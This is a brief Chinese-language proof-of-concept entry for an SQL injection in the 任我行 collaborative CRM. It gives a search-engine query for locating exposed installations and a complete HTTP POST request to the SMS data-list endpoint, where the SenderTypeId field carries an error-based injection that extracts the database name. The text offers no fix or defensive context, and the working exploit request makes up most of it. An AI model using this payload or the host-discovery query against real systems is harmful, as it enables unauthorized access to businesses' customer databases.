R2-1任我行-协同CRM-SQL

漏洞描述：

任我行CRM（Customer Relationship Management）是一款专业的企业级CRM软件，旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。

网站图片:

网络测绘:

Hunter 语法:

hunterapp.name=“任我行 CRM”

漏洞复现:

payload：

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host: your-ip
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Length: 23

Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(db_name())) AND 'CvNI'='CvNI

效果图: